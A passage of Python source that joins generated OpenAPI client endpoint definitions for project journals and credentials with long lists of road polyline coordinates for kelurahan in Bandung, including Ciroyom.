'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['journal_id'] = \
journal_id
kwargs['credential_id'] = \
credential_id
kwargs['insight_project_journal_credential_patch'] = \
insight_project_journal_credential_patch
return self.call_with_http_info(**kwargs)
self.insight_project_journal_credential_patch = _Endpoint(
settings={
'response_type': (JournalCredential,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/insight/{locationId}/project/{projectId}/journal/{journalId}/credential/{credentialId}',
'operation_id': 'insight_project_journal_credential_patch',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'journal_id',
'credential_id',
'insight_project_journal_credential_patch',
],
'required': [
'project_id',
'location_id',
'journal_id',
'credential_id',
'insight_project_journal_credential_patch',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'journal_id':
(str,),
'credential_id':
(str,),
'insight_project_journal_credential_patch':
(InsightProjectJournalCredentialPatch,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'journal_id': 'journalId',
'credential_id': 'credentialId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'journal_id': 'path',
'credential_id': 'path',
'insight_project_journal_credential_patch': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__insight_project_journal_credential_patch
)
def __insight_project_journal_delete(
self,
project_id,
location_id,
journal_id,
**kwargs
):
"""Delete insight/journal # noqa: E501
Delete journal # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.insight_project_journal_delete(project_id, location_id, journal_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
journal_id (str): Journal Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['journal_id'] = \
journal_id
return self.call_with_http_info(**kwargs)
self.insight_project_journal_delete = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerAuth'
],
'endpoint_path': '/insight/{locationId}/project/{projectId}/journal/{journalId}',
'operation_id': 'insight_project_journal_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'journal_id',
],
'required': [
'project_id',
'location_id',
'journal_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
| |
[107.5673473,-6.8934426],
[107.567197,-6.8937036],
[107.5674331,-6.8938474],
[107.567197,-6.8937036],
[107.5670468,-6.8939539],
[107.567197,-6.8937036],
[107.5673473,-6.8934426],
[107.5673918,-6.8934267],
[107.5675618,-6.8934853],
[107.5677549,-6.8935971],
[107.5677818,-6.893677],
[107.5676852,-6.8938634],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5648649,-6.8914296],
[107.5654767,-6.8916706],
[107.5654982,-6.8916147],
[107.5654767,-6.8916706],
[107.5658814,-6.891821],
[107.5658496,-6.8919396],
[107.5658814,-6.891821],
[107.5660856,-6.891857],
[107.5661017,-6.8918038],
[107.5660933,-6.8918396],
[107.566096,-6.8919515],
[107.5658559,-6.8926917],
[107.5657691,-6.8926799],
[107.5655824,-6.8926145],
[107.5657691,-6.8926825],
[107.5658559,-6.8926917],
[107.5655931,-6.8933281],
[107.5654161,-6.8932989],
[107.5655555,-6.8928994],
[107.5654161,-6.8932989],
[107.5652122,-6.8935172],
[107.5654161,-6.8932989],
[107.5655931,-6.8933281],
[107.5657084,-6.8930539],
[107.5661698,-6.893227],
[107.5663522,-6.8928116],
[107.5664836,-6.8929127],
[107.5663522,-6.8928116],
[107.5664809,-6.8924894],
[107.5660035,-6.8922524],
[107.5664809,-6.8924894],
[107.5665332,-6.8923775],
[107.5669328,-6.8925346],
[107.5665332,-6.8923775],
[107.5665842,-6.8922337],
[107.5665577,-6.8921633],
[107.566096,-6.8919515],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5645095,-6.8932962],
[107.564906,-6.8936092],
[107.5650572,-6.8937553],
[107.5652261,-6.893517],
[107.5650853,-6.8934371],
[107.5650424,-6.8933612],
[107.5650531,-6.8932494],
[107.5651076,-6.8930699],
[107.5648662,-6.8929607],
[107.5651076,-6.8930699],
[107.5652712,-6.892713],
[107.5652364,-6.8927836],
[107.5650003,-6.8926851],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5650859,-6.894871],
[107.5649973,-6.8950414],
[107.5650724,-6.8950787],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5647506,-6.8957444],
[107.5650142,-6.8958335],
[107.565051,-6.8958136],
[107.565338,-6.8952704],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5599402,-6.8953401],
[107.5601682,-6.8956996],
[107.5602335,-6.8957136],
[107.5606604,-6.8959371],
[107.5607914,-6.8960384],
[107.5608343,-6.8961183],
[107.5608396,-6.8962195],
[107.5606697,-6.8965144],
[107.5601682,-6.8956996],
[107.5606697,-6.8965144],
[107.561225,-6.8974171],
[107.5615853,-6.8971515],
[107.5618964,-6.8967574],
[107.5615853,-6.8971515],
[107.561225,-6.8974171],
[107.5613001,-6.8975396],
[107.5615048,-6.8974124],
[107.5613001,-6.8975396],
[107.5615254,-6.897915],
[107.5622451,-6.8974817],
[107.562449,-6.8975935],
[107.5624651,-6.8976841],
[107.562288,-6.8978598],
[107.5624651,-6.8976841],
[107.562449,-6.8975935],
[107.5622451,-6.8974817],
[107.5615254,-6.897915],
[107.5619116,-6.8985328],
[107.5621378,-6.8983551],
[107.5619116,-6.8985328],
[107.5620162,-6.8987299],
[107.5621088,-6.8986744],
[107.5620162,-6.8987299],
[107.5625634,-6.8996299],
[107.5629886,-6.8992762],
[107.5632032,-6.8989993],
[107.5634816,-6.8983231],
[107.56331,-6.8982086],
[107.5631624,-6.898198],
[107.5630498,-6.8980702],
[107.5628835,-6.8981447],
[107.5627816,-6.8983311],
[107.5628835,-6.8981447],
[107.5630498,-6.8980702],
[107.5631281,-6.8979182],
[107.5631651,-6.8978904],
[107.5633797,-6.8980076],
[107.56331,-6.8982086],
[107.5633797,-6.8980076],
[107.5631651,-6.8978904],
[107.5632751,-6.8976588],
[107.564702,-6.8986493],
[107.5641661,-6.8996427],
[107.5642117,-6.8997129],
[107.564378,-6.8998451],
[107.5646194,-6.8994931],
[107.5643512,-6.8993173],
[107.5646194,-6.8994931],
[107.5647642,-6.8992588],
[107.5644906,-6.899083],
[107.5647642,-6.8992588],
[107.5649922,-6.8988972],
[107.564702,-6.8986493],
[107.5649922,-6.8988972],
[107.5652202,-6.8990516],
[107.5649834,-6.8994079],
[107.5647642,-6.8992588],
[107.5649861,-6.8994079],
[107.5648574,-6.8996475],
[107.5646194,-6.8994931],
[107.5648574,-6.8996502],
[107.5646033,-6.9000368],
[107.5643699,-6.8998744],
[107.564378,-6.8998451],
[107.5643699,-6.8998744],
[107.5644263,-6.8999223],
[107.56404,-6.9004975],
[107.5645309,-6.9007957],
[107.5647079,-6.9005507],
[107.5646489,-6.9004629],
[107.5642385,-6.9001993],
[107.5646489,-6.9004629],
[107.5647079,-6.9005507],
[107.5649171,-6.9002392],
[107.5646033,-6.9000368],
[107.5649171,-6.9002392],
[107.5655255,-6.8992671],
[107.5652202,-6.8990516],
[107.5655255,-6.8992671],
[107.5651183,-6.8999223],
[107.5655742,-6.9002392],
[107.5652999,-6.9000443],
[107.5656735,-6.8995149],
[107.5654796,-6.8993493],
[107.5656735,-6.8995149],
[107.5658688,-6.8996505],
[107.5658237,-6.899688],
[107.5654991,-6.9001913],
[107.5658237,-6.899688],
[107.5658688,-6.8996505],
[107.5659544,-6.8996715],
[107.5664589,-6.9000073],
[107.5660753,-6.899757],
[107.5662121,-6.8996239],
[107.5667267,-6.8999008],
[107.566869,-6.8996741],
[107.5667993,-6.8995809],
[107.5664962,-6.8993839],
[107.5665605,-6.8993014],
[107.5664935,-6.8993839],
[107.566287,-6.8992534],
[107.5663781,-6.8992028],
[107.5662789,-6.8992561],
[107.5659168,-6.8990324],
[107.5659544,-6.8988939],
[107.5663325,-6.8980099],
[107.5676199,-6.8984603],
[107.5663325,-6.8980099],
[107.5651229,-6.8975945],
[107.5649592,-6.8979407],
[107.5649405,-6.8980845],
[107.5653052,-6.8982549],
[107.5649405,-6.8980845],
[107.5648198,-6.8984067],
[107.5659168,-6.8990324],
[107.5648036,-6.8984017],
[107.563999,-6.8978315],
[107.5648036,-6.8984017],
[107.5649405,-6.8980845],
[107.5649592,-6.8979407],
[107.5651229,-6.8975945],
[107.5636133,-6.8970598],
[107.5649061,-6.8975232],
[107.5654991,-6.8962457],
[107.5655847,-6.896221],
[107.5683769,-6.897161],
[107.5669875,-6.896703],
[107.5671217,-6.8963249],
[107.5669849,-6.8962583],
[107.5669527,-6.8962264],
[107.5666764,-6.8960719],
[107.5667461,-6.8958616],
[107.5665664,-6.895779],
[107.5663358,-6.8961145],
[107.5662124,-6.896253],
[107.5663358,-6.8961145],
[107.5665664,-6.895779],
[107.566612,-6.8956272],
[107.5667087,-6.8956643],
[107.5668133,-6.8956696],
[107.5668749,-6.8956991],
[107.566808,-6.8956696],
[107.5667087,-6.8956669],
[107.566612,-6.8956272],
[107.5665745,-6.8957338],
[107.5662687,-6.895582],
[107.5665745,-6.8957338],
[107.5665986,-6.8956619],
[107.5666469,-6.8955607],
[107.5664591,-6.8954329],
[107.5664053,-6.8953507],
[107.5661614,-6.8952065],
[107.5661105,-6.8952518],
[107.5660675,-6.8953796],
[107.5665986,-6.8956619],
[107.5660675,-6.8953796],
[107.5658852,-6.8960134],
[107.5659442,-6.8960293],
[107.5660622,-6.896048],
[107.5659442,-6.8960293],
[107.5658852,-6.8960134],
[107.5657618,-6.8962716],
[107.5658852,-6.8960134],
[107.56603,-6.8955234],
[107.5655177,-6.8952598],
[107.5656006,-6.895143],
[107.5656275,-6.8950498],
[107.5656572,-6.8949509],
[107.5656275,-6.8950524],
[107.5656033,-6.8951456],
[107.5655177,-6.8952598],
[107.5653834,-6.8955823],
[107.5652627,-6.8957927],
[107.5653807,-6.8955823],
[107.5655177,-6.8952598],
[107.56603,-6.8955234],
[107.5660675,-6.8953796],
[107.5661105,-6.8952518],
[107.5661614,-6.8952065],
[107.566384,-6.8948391],
[107.5662164,-6.8947043],
[107.5658945,-6.8951064],
[107.5662164,-6.8947043],
[107.5659696,-6.8944886],
[107.5659015,-6.8944306],
[107.5660249,-6.8942122],
[107.5659015,-6.8944306],
[107.5658372,-6.8943746],
[107.5659364,-6.8941909],
[107.5658372,-6.8943746],
[107.565408,-6.8940311],
[107.5652632,-6.8942175],
[107.565408,-6.8940311],
[107.5652685,-6.8939273],
[107.5650996,-6.8941802],
[107.5652685,-6.8939273],
[107.5651934,-6.8939033],
[107.5652873,-6.8937995],
[107.5651934,-6.8939033],
[107.565003,-6.8937116],
[107.5649279,-6.8937995],
[107.565003,-6.8937116],
[107.564906,-6.8936092],
[107.5647509,-6.8938474],
[107.5646677,-6.8940684],
[107.5644421,-6.8944663],
[107.5646677,-6.8940684],
[107.5643137,-6.8938607],
[107.5644075,-6.8936983],
[107.5643137,-6.8938607],
[107.5641259,-6.8941163],
[107.5643137,-6.8938607],
[107.5641179,-6.8937276],
[107.5639596,-6.8940045],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5662883,-6.891759],
[107.5668064,-6.892011],
[107.5668571,-6.8920704],
[107.5668544,-6.8921343],
[107.566892,-6.8922196],
[107.5668893,-6.8922835],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5667062,-6.8939379],
[107.566732,-6.8939459],
[107.5671595,-6.8942308],
[107.5672909,-6.8939912],
[107.5671595,-6.8942308],
[107.5674331,-6.8944066],
[107.5675672,-6.8942016],
[107.5676959,-6.8940631],
[107.5675672,-6.8942016],
[107.5674331,-6.8944066],
[107.5680124,-6.8948007],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.566384,-6.8948391],
[107.5667287,-6.8951037],
[107.5668977,-6.894896],
[107.5670774,-6.8946936],
[107.5668548,-6.8945498],
[107.5670774,-6.8946936],
[107.5672866,-6.8948241],
[107.5671659,-6.895101],
[107.5672165,-6.8951513],
[107.5670533,-6.8953726],
[107.5667287,-6.8951037],
[107.5674365,-6.8956839],
[107.5671217,-6.8963249],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5651612,-6.9012271],
[107.565019,-6.9014638],
[107.5653543,-6.9016398],
[107.5656493,-6.9017889],
[107.5656433,-6.9018904],
[107.5653463,-6.9023827],
[107.5650861,-6.9022496],
[107.5650378,-6.9021324],
[107.5651337,-6.9020022],
[107.5653543,-6.9016398],
[107.5651987,-6.9019114],
[107.5655126,-6.9020739],
[107.5651987,-6.9019114],
[107.565078,-6.9020632],
[107.564834,-6.9017274],
[107.565019,-6.9014638],
[107.564834,-6.9017274],
[107.5646569,-6.9018845],
[107.5647749,-6.9020579],
[107.5646569,-6.9018845],
[107.5641137,-6.9021941],
[107.5637918,-6.9016483],
[107.5641137,-6.9021941],
[107.5644034,-6.9026734],
[107.5647165,-6.9024614],
[107.5648849,-6.9026914],
[107.5648795,-6.9027712],
[107.5645911,-6.9029797],
[107.5644034,-6.9026734],
[107.5645911,-6.9029797],
[107.5652,-6.9039968],
[107.5652759,-6.9039315],
[107.5655119,-6.9035215],
[107.5656982,-6.9031164],
[107.565843,-6.9027277],
[107.5659732,-6.9023392],
[107.5669281,-6.9003421],
[107.5668208,-6.9005605],
[107.5675236,-6.9008747],
[107.567309,-6.9007815],
[107.5669227,-6.9015643],
[107.5664721,-6.901322],
[107.5669227,-6.9015643],
[107.5664453,-6.9025416],
[107.5659732,-6.9023392],
[107.5664453,-6.9025416],
[107.5668798,-6.9027439],
[107.5670339,-6.9027383],
[107.5670622,-6.9025629],
[107.5674485,-6.9017427],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5672263,-6.8961199],
[107.5676715,-6.8964101],
[107.5676956,-6.8964767],
[107.5677788,-6.8965273],
[107.5678603,-6.8965123],
[107.5680296,-6.8964031],
[107.5676993,-6.8959798],
[107.5674529,-6.8956975],
[107.567702,-6.8959771],
[107.5680296,-6.8964031],
[107.5683001,-6.8968212],
[107.56844,-6.8969251],
[107.5685553,-6.8968878],
[107.5685925,-6.8968132],
[107.5686032,-6.8967493],
[107.5686036,-6.8967892],
[107.5684423,-6.8965895],
[107.5682733,-6.8963392],
[107.5682254,-6.896254],
[107.56798,-6.8959758],
[107.5681017,-6.8958999],
[107.56798,-6.8959758],
[107.5676742,-6.8956216],
[107.5673184,-6.8953753],
[107.5673067,-6.8952994],
[107.567642,-6.8947802],
[107.5673067,-6.8952994],
[107.5673184,-6.895378],
[107.5676742,-6.8956216],
[107.5680292,-6.8950265],
[107.5679219,-6.8952075],
[107.5681017,-6.8958999],
[107.5682254,-6.8961502],
[107.5682254,-6.896254],
]])
self.jalan.record(nama)
self.jalan.line([[
[107.5637852,-6.8990676],
[107.5635867,-6.898977],
[107.5634794,-6.8989717],
[107.5632751,-6.8988477],
[107.5634794,-6.8989717],
[107.5629859,-6.899664],
[107.5630771,-6.899925],
[107.5628772,-6.9001332],
[107.5625634,-6.8996299],
[107.5628772,-6.9001332],
[107.5637918,-6.9016483],
[107.5639374,-6.9015708],
[107.5642378,-6.9011448],
[107.5645309,-6.9007957],
[107.5651612,-6.9012271],
[107.5655152,-6.900657],
[107.5655126,-6.9006064],
[107.5649171,-6.9002392],
[107.5655126,-6.9006064],
[107.5656708,-6.9004946],
[107.5657566,-6.9004946],
[107.5662609,-6.9007475],
[107.5661911,-6.9007103],
[107.5664406,-6.9001564],
[107.5665184,-6.9002097],
[107.5664406,-6.9001564],
[107.5661214,-6.8999221],
[107.566159,-6.8999514],
[107.5657566,-6.9004946],
[107.5659578,-6.900223],
[107.5660544,-6.9002709],
[107.5661885,-6.8999753],
[107.5660544,-6.9002709],
[107.5659149,-6.9005745],
]])
    def jalanKelurahanCiroyom(self, nama):
        """Write the road polylines of Kelurahan Ciroyom to the writer.

        Each segment is emitted as one attribute record named *nama* via
        ``self.jalan.record`` followed by one polyline via
        ``self.jalan.line``, whose points are [longitude, latitude] pairs.
        Repeated/back-tracking points within a part trace side branches of
        the road within a single polyline.
        NOTE(review): ``self.jalan`` looks like a pyshp ``Writer`` — confirm.
        """
        # Segment 1
        self.jalan.record(nama)
        self.jalan.line([[
            [107.5840308,-6.915249],
            [107.5842615,-6.9142664],
            [107.5845351,-6.9142771],
            [107.5845431,-6.9142478],
            [107.5845807,-6.9137019],
            [107.5848891,-6.9136514],
            [107.5848918,-6.9135901],
            [107.584983,-6.9135795],
            [107.5850367,-6.913204],
            [107.584924,-6.9132067],
            [107.5850367,-6.913204],
            [107.5851118,-6.9129031],
            [107.5851359,-6.9128153],
            [107.5852083,-6.9126022],
            [107.58516,-6.9125836],
            [107.5852405,-6.9123386],
            [107.5844621,-6.9118109],
            [107.5852405,-6.9123386],
            [107.5857367,-6.9126875],
            [107.5855785,-6.9130576],
            [107.585439,-6.9135209],
            [107.5849991,-6.9134596],
            [107.585439,-6.9135235],
            [107.5854014,-6.9137259],
            [107.5854014,-6.9139815],
            [107.5852915,-6.9139815],
            [107.5854309,-6.9147564],
            [107.5852888,-6.9148203],
            [107.585321,-6.9151558],
            [107.5853103,-6.9154833],
            [107.5851842,-6.9154966],
            [107.5851815,-6.9154327],
            [107.5851842,-6.9154966],
            [107.5851815,-6.9156191],
        ]])
        # Segment 2
        self.jalan.record(nama)
        self.jalan.line([[
            [107.5850876,-6.9184706],
            [107.586536,-6.9186623],
            [107.5878127,-6.9187848],
            [107.5878556,-6.918199],
            [107.5879307,-6.918199],
            [107.5878556,-6.918199],
            [107.5878127,-6.9187848],
            [107.5884028,-6.9188594],
            [107.5889982,-6.9189233],
            [107.5901462,-6.9190724],
            [107.5917019,-6.9192747],
            [107.5923242,-6.919344],
            [107.5929357,-6.9194292],
            [107.5930215,-6.9188221],
            [107.5917829,-6.918673],
            [107.5915737,-6.9185186],
            [107.5914717,-6.9183109],
            [107.5917185,-6.9181937],
            [107.591461,-6.9183162],
            [107.5914825,-6.9181511],
            [107.5914771,-6.9183109],
            [107.5909299,-6.9183748],
            [107.5907529,-6.9181937],
            [107.5901896,-6.9185186],
            [107.590136,-6.9186624],
            [107.5901462,-6.9190724],
            [107.590136,-6.9186624],
            [107.5901896,-6.9185186],
            [107.590256,-6.91848],
            [107.5901574,-6.9182363],
            [107.5893079,-6.9181977],
            [107.5893474,-6.9178156],
            [107.5892938,-6.9183269],
            [107.5895995,-6.9183641],
            [107.5896371,-6.918215],
            [107.5895995,-6.9183641],
            [107.5895942,-6.9185399],
            [107.5895995,-6.9183641],
            [107.5892938,-6.9183269],
            [107.5890631,-6.9183002],
            [107.5889982,-6.9189233],
            [107.5890631,-6.9183002],
            [107.5885267,-6.9182363],
            [107.5884028,-6.9188594],
            [107.5885267,-6.9182363],
            [107.5881994,-6.9181724],
            [107.58806,-6.9181937],
            [107.5881994,-6.9181724],
            [107.5882316,-6.9177357],
            [107.5879098,-6.9176931],
            [107.5882316,-6.9177357],
            [107.5881994,-6.9181724],
            [107.5885267,-6.9182363],
            [107.5887124,-6.9182576],
            [107.5888163,-6.9172991],
            [107.5889773,-6.9172298],
            [107.5889987,-6.9171074],
            [107.5889773,-6.9172298],
            [107.5888163,-6.9172991],
            [107.5887626,-6.9172586],
            [107.5884622,-6.9172347],
            [107.5878239,-6.9171415],
            [107.5872043,-6.9170935],
            [107.5870353,-6.9171415],
            [107.5867617,-6.9171441],
            [107.5866705,-6.9171388],
            [107.5866437,-6.9173145],
            [107.5865364,-6.9173465],
            [107.5864774,-6.9174743],
            [107.5865042,-6.9175968],
            [107.5865525,-6.9177672],
            [107.5865632,-6.918108],
            [107.586536,-6.9186623],
        ]])
        # Segment 3
        self.jalan.record(nama)
        self.jalan.line([[
            [107.5851589,-6.9176585],
            [107.5852342,-6.9176629],
            [107.5852879,-6.9171677],
            [107.5852342,-6.9176629],
            [107.5861998,-6.9177375],
            [107.586232,-6.9173647],
            [107.5854917,-6.9172955],
            [107.5853844,-6.9180304],
            [107.5861569,-6.9180996],
            [107.5861998,-6.9177375],
        ]])
        # Segment 4
        self.jalan.record(nama)
        self.jalan.line([[
            [107.5930215,-6.9188221],
            [107.5931774,-6.9177051],
            [107.5931077,-6.9177158],
            [107.5931774,-6.9177051],
            [107.5932954,-6.9170661],
            [107.5933169,-6.9165122],
            [107.5927697,-6.9164803],
            [107.5928233,-6.9160383],
            [107.592877,-6.915969],
            [107.5928877,-6.915772],
            [107.592877,-6.915969],
            [107.5929521,-6.915985],
            [107.5929574,-6.9158226],
            [107.5929521,-6.915985],
            [107.5932149,-6.9160289],
            [107.5929521,-6.915985],
            [107.592877,-6.915969],
            [107.5928233,-6.9160383],
            [107.5927697,-6.9164803],
            [107.5913213,-6.9164962],
            [107.5910531,-6.9168104],
            [107.5909136,-6.917966],
            [107.5907529,-6.9181937],
            [107.5909136,-6.917966],
            [107.590974,-6.9174628],
            [107.5910531,-6.9168104],
            [107.5910531,-6.9164962],
            [107.5913213,-6.9164962],
            [107.5910531,-6.9164962],
            [107.5904737,-6.9164536],
            [107.5904415,-6.9166986],
            [107.5904737,-6.9164536],
            [107.590066,-6.9164004],
            [107.5899534,-6.9171459],
            [107.5898944,-6.9177424],
            [107.5898622,-6.9182163],
            [107.589889,-6.9177371],
            [107.589948,-6.9171353],
            [107.5900017,-6.9168477],
            [107.5898085,-6.9168477],
            [107.5898085,-6.9167359],
            [107.589712,-6.9165921],
            [107.5897066,-6.9163738],
            [107.590066,-6.9164004],
            [107.5897066,-6.9163738],
            [107.5894223,-6.9163205],
            [107.5894062,-6.9164749],
            [107.5893794,-6.9166187],
            [107.5894545,-6.9166773],
            [107.5894598,-6.9167146],
            [107.5894116,-6.9167998],
            [107.5894759,-6.9168158],
            [107.5894545,-6.9169223],
            [107.5896261,-6.916885],
            [107.5898085,-6.9168477],
        ]])
        # Segment 5
        self.jalan.record(nama)
        self.jalan.line([[
            [107.5890883,-6.9137554],
            [107.589024,-6.9145329],
            [107.5891151,-6.9147299],
            [107.5900646,-6.9159441],
            [107.5902953,-6.9157844],
            [107.5908371,-6.915827],
            [107.5902953,-6.9157844],
            [107.5904884,-6.9155501],
            [107.5903972,-6.9156619],
            [107.5899627,-6.91514],
            [107.5903972,-6.9156619],
            [107.5902953,-6.9157844],
            [107.5900646,-6.9159441],
            [107.5905314,-6.9164554],
            [107.5910531,-6.9164962],
            [107.5913213,-6.9164962],
            [107.5918456,-6.9164926],
            [107.5916793,-6.9158696],
            [107.5913467,-6.9155394],
            [107.5915238,-6.9153264],
            [107.5915881,-6.915124],
            [107.5917705,-6.9149057],
            [107.5920924,-6.9152039],
            [107.5917652,-6.914911],
            [107.5913414,-6.9146021],
            [107.5906923,-6.9142666],
            [107.590923,-6.914224],
            [107.5916203,-6.9142453],
            [107.5909283,-6.9142187],
            [107.5906869,-6.914272],
            [107.5905367,-6.9142933],
            [107.5904026,-6.9146075],
            [107.5904455,-6.9145169],
            [107.5911965,-6.9149589],
            [107.5910249,-6.9152838],
            [107.5913414,-6.9155501],
            [107.5910356,-6.9152891],
            [107.5905099,-6.914895],
            [107.590585,-6.9149589],
            [107.5907459,-6.9147033],
            [107.5904509,-6.9145169],
            [107.5901183,-6.9143465],
            [107.5894048,-6.9140909],
            [107.5890669,-6.9139844],
            [107.589024,-6.9145436],
            [107.5885358,-6.9141388],
            [107.5880315,-6.9145649],
            [107.5880047,-6.914927],
            [107.5886163,-6.9150761],
            [107.5891205,-6.9147299],
            [107.5886216,-6.9150708],
            [107.5881335,-6.9154702],
            [107.5884178,-6.916237],
            [107.5894223,-6.9163205],
            [107.5890642,-6.9162929],
            [107.5890964,-6.9164634],
            [107.5890695,-6.9166178],
            [107.5890481,-6.9168255],
            [107.5890374,-6.9168628],
            [107.5886833,-6.9169586],
        ]])
        # Segment 6
        self.jalan.record(nama)
        self.jalan.line([[
            [107.5884622,-6.9172347],
            [107.5884771,-6.9170196],
            [107.5883752,-6.916945],
            [107.5883591,-6.9167347],
            [107.5883645,-6.9162341],
            [107.5884178,-6.916237],
            [107.5883672,-6.9162288],
            [107.5879675,-6.9161729],
            [107.5879756,-6.916314],
            [107.5879407,-6.9166016],
            [107.5879622,-6.9168359],
            [107.5879434,-6.9166016],
            [107.5879783,-6.9163113],
            [107.5879648,-6.9161702],
            [107.5876081,-6.9161409],
            [107.5876403,-6.916543],
            [107.587702,-6.9168332],
            [107.5877127,-6.9170169],
            [107.5878415,-6.9170382],
            [107.5878239,-6.9171415],
            [107.5878361,-6.9170382],
            [107.5877047,-6.9170089],
            [107.5877047,-6.9168279],
            [107.5876376,-6.916535],
            [107.5876081,-6.9161382],
            [107.5875732,-6.9161329],
            [107.5875893,-6.9158533],
            [107.5883001,-6.9159252],
            [107.5878924,-6.9158853],
            [107.58793,-6.9157388],
            [107.5881335,-6.9154702],
            [107.58793,-6.9157335],
            [107.5878897,-6.915888],
            [107.5875866,-6.915856],
            [107.587769,-6.9154752],
            [107.5880399,-6.9149427],
            [107.5880047,-6.914927],
            [107.5880315,-6.9145649],
            [107.586959,-6.9154167],
            [107.5869912,-6.9154353],
            [107.5869885,-6.9154726],
            [107.5870127,-6.9155152],
            [107.5869697,-6.9158693],
            [107.5869697,-6.9160797],
            [107.5875786,-6.9161356],
            [107.5869697,-6.916077],
            [107.5867739,-6.9160664],
            [107.5867364,-6.91633],
            [107.5867364,-6.916559],
            [107.5866908,-6.9166415],
            [107.5867203,-6.9168572],
            [107.5867471,-6.9170888],
            [107.5867617,-6.9171441],
            [107.5867444,-6.9170888],
            [107.5867176,-6.9168519],
            [107.5863153,-6.9168998],
            [107.5862643,-6.9167879],
            [107.5863153,-6.9169078],
            [107.5863421,-6.9169956],
            [107.5859881,-6.9169983],
            [107.5853631,-6.9169424],
            [107.58517,-6.9168998],
            [107.5853631,-6.9169424],
            [107.5853792,-6.9166974],
            [107.5855213,-6.9167081],
            [107.5853846,-6.9166974],
            [107.5851861,-6.9167001],
            [107.5853792,-6.9166974],
            [107.5853872,-6.916543],
            [107.5857359,-6.9165989],
            [107.5853872,-6.9165377],
            [107.5851941,-6.916527],
            [107.5853899,-6.916543],
            [107.5854087,-6.9163859],
            [107.5851995,-6.9163513],
            [107.5854141,-6.9163832],
            [107.5854275,-6.9162208],
            [107.5855991,-6.9158294],
            [107.5852236,-6.9157149],
            [107.5856018,-6.9158294],
            [107.5861222,-6.9159865],
            [107.586149,-6.9163273],
            [107.5862268,-6.916322],
            [107.5862965,-6.9163646],
            [107.5864521,-6.9163486],
            [107.5865674,-6.9163752],
            [107.5867418,-6.916338],
            [107.5865647,-6.9163779],
            [107.5864494,-6.9163486],
            [107.5862938,-6.9163646],
            [107.5862187,-6.916322],
            [107.5861436,-6.9163246],
            [107.5861302,-6.9164737],
            [107.5859344,-6.9164498],
            [107.5857735,-6.9164072],
            [107.5854087,-6.9163859],
            [107.5854302,-6.9162155],
            [107.5856233,-6.9162794],
        ]])
        # Segment 7
        self.jalan.record(nama)
        self.jalan.line([[
            [107.5834349,-6.9110762],
            [107.5836306,-6.9112092],
            [107.5834267,-6.9116352],
            [107.583239,-6.9115606],
            [107.5834267,-6.9116352],
            [107.5836306,-6.9112092],
            [107.5838023,-6.9113423],
            [107.583636,-6.9116299],
            [107.5838023,-6.9113423],
            [107.5844621,-6.9118109],
            [107.5844192,-6.9119707],
            [107.584505,-6.9122316],
            [107.5845694,-6.9123754],
            [107.5845425,-6.9126044],
            [107.5840544,-6.9125512],
            [107.5839471,-6.9128334],
            [107.5845479,-6.9128387],
            [107.5839471,-6.9128334],
            [107.5837969,-6.9131689],
            [107.5847035,-6.9132062],
            [107.5837969,-6.9131689],
            [107.5836441,-6.9139414],
        ]])
        # Segment 8 (short connector)
        self.jalan.record(nama)
        self.jalan.line([[
            [107.5830862,-6.9138388],
            [107.5831746,-6.913342],
        ]])
        # Segment 9
        self.jalan.record(nama)
        self.jalan.line([[
            [107.5853103,-6.9154833],
            [107.5856881,-6.9154143],
            [107.5855915,-6.91514],
            [107.5856881,-6.9154143],
            [107.5856881,-6.9155794],
            [107.5856291,-6.9158377],
            [107.5857927,-6.9158829],
            [107.5859697,-6.9153903],
            [107.5856881,-6.9154143],
            [107.5859697,-6.9153903],
            [107.5859992,-6.9152945],
            [107.586077,-6.9152732],
            [107.5866376,-6.9153664],
